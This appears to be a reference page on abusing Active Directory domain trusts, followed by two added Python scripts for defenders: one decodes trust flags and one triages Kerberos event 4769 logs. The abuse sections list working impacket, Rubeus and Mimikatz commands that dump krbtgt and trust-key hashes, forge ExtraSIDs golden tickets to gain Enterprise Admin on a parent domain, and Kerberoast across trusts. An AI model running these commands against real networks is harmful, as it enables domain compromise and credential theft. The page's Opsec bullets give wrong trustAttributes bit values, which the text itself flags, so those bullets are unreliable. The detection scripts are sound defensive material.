TrustedBy
Domain A is trusted by Domain B, meaning principals in Domain A can authenticate to resources in Domain B. Enables cross-trust lateral movement and ExtraSIDs attacks.
Applies to: Domain -> Domain
Linux Abuse
Enumerate trusts
GetADUsers.py -all -dc-ip <dc-ip> '<domain>/<username>:<password>'
ldapsearch -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' -b 'DC=<domain>,DC=<tld>' '(objectClass=trustedDomain)'
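The following is an added example, not code from the original page nor from the BloodHound or impacket projects. It parses ldapsearch output of the kind the trustedDomain query above returns and decodes each trust's trustAttributes and trustDirection so a defender can see which trusts do not have SID filtering indicated by their flags. The bit values come from the [MS-ADTS] trustAttributes (6.1.6.7.9) and trustDirection (6.1.6.7.12) definitions; they differ from the shorthand in the Opsec bullets at the end of this page. The LDIF text, domain names and the wording of the verdicts are constructed for the example.

```python
import re

# trustAttributes bits as defined in [MS-ADTS] 6.1.6.7.9 (not page content).
TRUST_ATTRIBUTE_FLAGS = {
    0x01: "NON_TRANSITIVE",
    0x02: "UPLEVEL_ONLY",
    0x04: "QUARANTINED_DOMAIN",   # SID filtering (quarantine) enforced
    0x08: "FOREST_TRANSITIVE",    # forest trust
    0x10: "CROSS_ORGANIZATION",
    0x20: "WITHIN_FOREST",        # parent/child or tree-root trust
    0x40: "TREAT_AS_EXTERNAL",    # forest trust with SID history enabled
    0x80: "USES_RC4_ENCRYPTION",
}
# trustDirection values as defined in [MS-ADTS] 6.1.6.7.12.
TRUST_DIRECTION = {0: "DISABLED", 1: "INBOUND", 2: "OUTBOUND", 3: "BIDIRECTIONAL"}

# Constructed sample in the shape ldapsearch prints for the trustedDomain
# query; the domain names and values are made up for this example.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=child.corp.example,CN=System,DC=corp,DC=example
objectClass: top
objectClass: trustedDomain
flatName: CHILD
trustPartner: child.corp.example
trustDirection: 3
trustAttributes: 32

dn: CN=partner.example,CN=System,DC=corp,DC=example
objectClass: top
objectClass: trustedDomain
flatName: PARTNER
trustPartner: partner.example
trustDirection: 3
trustAttributes: 8

dn: CN=legacy.example,CN=System,DC=corp,DC=example
objectClass: top
objectClass: trustedDomain
flatName: LEGACY
trustPartner: legacy.example
trustDirection: 1
trustAttributes: 4

search: 2
result: 0 Success
"""


def parse_ldif_entries(text):
    """Minimal LDIF reader for ldapsearch output: one dict of value lists per entry."""
    entries, current, last_key = [], {}, None
    for raw in text.splitlines() + [""]:
        if raw.startswith("#") or re.match(r"^(search|result|ref): ", raw):
            continue                                # ldapsearch commentary / trailer
        if raw == "":                               # a blank line ends an entry
            if current:
                entries.append(current)
            current, last_key = {}, None
        elif raw.startswith(" ") and last_key:
            current[last_key][-1] += raw[1:]        # folded continuation line
        else:
            last_key, _, value = raw.partition(":")
            current.setdefault(last_key, []).append(value.strip())
    return entries


def decode_trust_attributes(value):
    """Return the flag names set in a trustAttributes integer; unknown bits as hex."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTE_FLAGS.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTE_FLAGS)
    if unknown:
        names.append("UNKNOWN_0x%X" % unknown)
    return names


def sid_filtering_verdict(flags):
    """Heuristic reading of what the flags say about SID filtering (assumption-based)."""
    if "QUARANTINED_DOMAIN" in flags:
        return "enforced (quarantine flag set)"
    if "WITHIN_FOREST" in flags:
        return "not enforced (intra-forest trust; SID history honoured)"
    if "FOREST_TRANSITIVE" in flags:
        if "TREAT_AS_EXTERNAL" in flags:
            return "relaxed (forest trust treated as external; SID history enabled)"
        return "assumed enforced (forest trust default, no relaxing flag)"
    return "not enforced (external trust without quarantine flag)"


def assess_trusts(ldif_text):
    """Decode every trustedDomain entry in the LDIF text into a review-friendly record."""
    findings = []
    for entry in parse_ldif_entries(ldif_text):
        if "trustedDomain" not in entry.get("objectClass", []):
            continue
        flags = decode_trust_attributes(int(entry.get("trustAttributes", ["0"])[0]))
        direction = int(entry.get("trustDirection", ["0"])[0])
        findings.append({
            "partner": entry.get("trustPartner", ["?"])[0],
            "direction": TRUST_DIRECTION.get(direction, "UNKNOWN_%d" % direction),
            "flags": flags,
            "sid_filtering": sid_filtering_verdict(flags),
        })
    return findings


if __name__ == "__main__":
    for t in assess_trusts(SAMPLE_LDIF):
        print("%-22s %-13s %-32s SID filtering: %s"
              % (t["partner"], t["direction"], ",".join(t["flags"]), t["sid_filtering"]))
```

Feed it the real ldapsearch output (`ldapsearch ... > trusts.ldif`, then `assess_trusts(open("trusts.ldif").read())`) and review any trust whose verdict is "not enforced" or "relaxed"; those are the trusts on which SID history in a ticket is honoured. The verdicts are a reading of the flags only, not a test of the DC's behaviour.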
Cross-trust TGS request (getST)
# Get TGS for service in trusted domain using credentials from trusting domain
getST.py -spn '<spn>/<target-computer>.<target-domain>' -dc-ip <dc-ip> -target-domain <target-domain> '<domain>/<username>:<password>'
Cross-trust with ccache
KRB5CCNAME=<ccache> getST.py -spn 'cifs/<target-computer>.<target-domain>' -dc-ip <target-dc-ip> -target-domain <target-domain> -k -no-pass '<domain>/<username>'
ExtraSIDs Attack: Forge golden ticket with SID History (inter-forest)
# Step 1: Get krbtgt hash of child domain
secretsdump.py '<child-domain>/<username>:<password>'@<child-dc-ip> -just-dc-user 'krbtgt'
# Step 2: Get Enterprise Admins SID of parent domain (S-1-5-21-<parent>-519)
lookupsid.py '<domain>/<username>:<password>'@<parent-dc-ip> | grep -i enterprise
# Step 3: Forge golden ticket with ExtraSIDs
ticketer.py -nthash <krbtgt-hash> -domain-sid <child-domain-sid> -domain <child-domain> -extra-sid <parent-enterprise-admins-sid> Administrator
# Step 4: Use ticket against parent DC
KRB5CCNAME=Administrator.ccache secretsdump.py -k -no-pass '<child-domain>/Administrator'@<parent-dc-fqdn>
Child-to-Parent via trust key (alternative to krbtgt)
# Get trust key
secretsdump.py '<child-domain>/<username>:<password>'@<child-dc-ip> -just-dc-user '<child-domain>$'
# Forge inter-realm TGT
ticketer.py -nthash <trust-key-hash> -domain-sid <child-domain-sid> -domain <child-domain> -extra-sid <parent-enterprise-admins-sid> -spn 'krbtgt/<parent-domain>' Administrator
# Get usable TGS from parent DC
KRB5CCNAME=Administrator.ccache getST.py -k -no-pass -spn 'cifs/<parent-dc-fqdn>' -dc-ip <parent-dc-ip> '<child-domain>/Administrator'
Cross-trust Kerberoast
GetUserSPNs.py -target-domain <target-domain> -dc-ip <dc-ip> '<domain>/<username>:<password>'
Cross-trust AS-REP Roast
GetNPUsers.py <target-domain>/ -dc-ip <target-dc-ip> -usersfile users.txt -no-pass
Windows Abuse
Enumerate trusts (PowerView)
Get-DomainTrust
Get-ForestTrust
Get-DomainTrust -Domain <target-domain>
Cross-trust lateral movement (Rubeus)
# Request TGT in current domain
Rubeus.exe asktgt /user:<username> /password:<password> /domain:<domain> /dc:<dc-ip> /nowrap
# Request cross-realm TGS
Rubeus.exe asktgs /ticket:<base64-tgt> /service:'cifs/<target-computer>.<target-domain>' /dc:<target-dc-ip> /targetdomain:<target-domain> /ptt
ExtraSIDs Golden Ticket (Mimikatz)
# Forge golden ticket with SID history pointing to EA
mimikatz "kerberos::golden /user:Administrator /domain:<child-domain> /sid:<child-domain-sid> /krbtgt:<krbtgt-hash> /sids:<parent-enterprise-admins-sid> /ptt" exit
# Access parent DC
dir \\<parent-dc-fqdn>\C$
Kerberoast across trust (PowerView)
Get-DomainUser -SPN -Domain <target-domain> | Get-DomainSPNTicket -OutputFormat Hashcat -Domain <target-domain>
Opsec
- Cross-trust TGS requests are logged on the trusting domain's DC
- ExtraSIDs/golden ticket attacks bypass audit if SID filtering is not enforced (check with netdom trust <domain> /domain:<target-domain> /quarantine)
- SID filtering (quarantine) blocks ExtraSIDs for forest trusts; check with Get-DomainTrust | Select-Object TrustAttributes
- TrustAttributes 0x4 = WITHIN_FOREST (SID filtering off), 0x20 = FOREST_TRANSITIVE
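The Opsec note that cross-trust TGS requests are logged on the trusting domain's DC points at Windows event 4769 (Kerberos service ticket requested). The following is an added example, not code from the original page or any of the tools it lists, that triages such records: it reports service tickets issued to principals from another realm, flags the case where that ticket is RC4-HMAC (etype 0x17, the type ticketer.py and Mimikatz produce when given an NT hash), and notes referral TGT requests for a foreign realm. The log format is a simplified one-line "key=value" rendering of the event's fields (Account Name, Account Domain, Service Name, Ticket Encryption Type, Failure Code, Client Address), the realm names are made up, and the sample lines are constructed for the example.

```python
import re

LOCAL_REALM = "CORP.EXAMPLE"   # realm of the DC whose 4769 events are being read (assumed)
RC4_HMAC = 0x17                # etype of tickets forged from an NT hash (ticketer/mimikatz default)

# Constructed sample events in a simplified key=value form, not a real export.
SAMPLE_4769 = """\
2024-05-02T09:12:03Z EventID=4769 AccountName=alice@CHILD.CORP.EXAMPLE AccountDomain=CHILD.CORP.EXAMPLE ServiceName=cifs/fs01.corp.example TicketEncryptionType=0x12 FailureCode=0x0 ClientAddress=::ffff:10.0.2.15
2024-05-02T09:13:41Z EventID=4769 AccountName=bob@CORP.EXAMPLE AccountDomain=CORP.EXAMPLE ServiceName=http/web01.corp.example TicketEncryptionType=0x12 FailureCode=0x0 ClientAddress=::ffff:10.0.1.7
2024-05-02T09:15:22Z EventID=4769 AccountName=Administrator@CHILD.CORP.EXAMPLE AccountDomain=CHILD.CORP.EXAMPLE ServiceName=cifs/dc01.corp.example TicketEncryptionType=0x17 FailureCode=0x0 ClientAddress=::ffff:10.0.9.77
2024-05-02T09:16:00Z EventID=4769 AccountName=svc-backup@CORP.EXAMPLE AccountDomain=CORP.EXAMPLE ServiceName=krbtgt/PARTNER.EXAMPLE TicketEncryptionType=0x12 FailureCode=0x0 ClientAddress=::ffff:10.0.1.9
"""


def parse_event(line):
    """Turn one 'key=value ...' line into a dict; the first token is the timestamp."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    fields["timestamp"] = line.split(" ", 1)[0]
    return fields


def triage_4769(log_text, local_realm=LOCAL_REALM):
    """Return one finding per successful 4769 event that involves another Kerberos realm."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4769" or ev.get("FailureCode", "0x0") != "0x0":
            continue                                    # only issued tickets matter here
        account_realm = ev.get("AccountDomain", "").upper()
        svc_class, _, svc_realm = ev.get("ServiceName", "").partition("/")
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        reasons = []
        # A principal from a trusted realm obtained a service ticket in this realm.
        if account_realm and account_realm != local_realm.upper():
            reasons.append("TGS issued to principal from trusted realm %s" % account_realm)
            if etype == RC4_HMAC:
                reasons.append("RC4-HMAC (0x17) ticket for a cross-realm principal")
        # A local principal asked for a referral TGT into another realm.
        if svc_class.lower() == "krbtgt" and svc_realm.upper() != local_realm.upper():
            reasons.append("referral TGT requested for realm %s" % svc_realm)
        if reasons:
            findings.append({
                "timestamp": ev["timestamp"],
                "account": ev.get("AccountName", "?"),
                "service": ev.get("ServiceName", "?"),
                "client": ev.get("ClientAddress", "?"),
                "severity": "high" if any(r.startswith("RC4") for r in reasons) else "info",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in triage_4769(SAMPLE_4769):
        print("%s [%s] %s -> %s from %s: %s"
              % (f["timestamp"], f["severity"], f["account"], f["service"],
                 f["client"], "; ".join(f["reasons"])))
```

The "high" rule is deliberately limited to service tickets issued to foreign principals: referral TGTs (krbtgt/<other realm>) are legitimately RC4 on trusts that have not had AES enabled, so they are only reported as informational. Cross-realm requests themselves are normal traffic in a multi-domain forest; the value of the informational findings is in baselining which accounts and client addresses usually cross the trust, so that a privileged account from a child domain hitting the parent DC from a new address stands out.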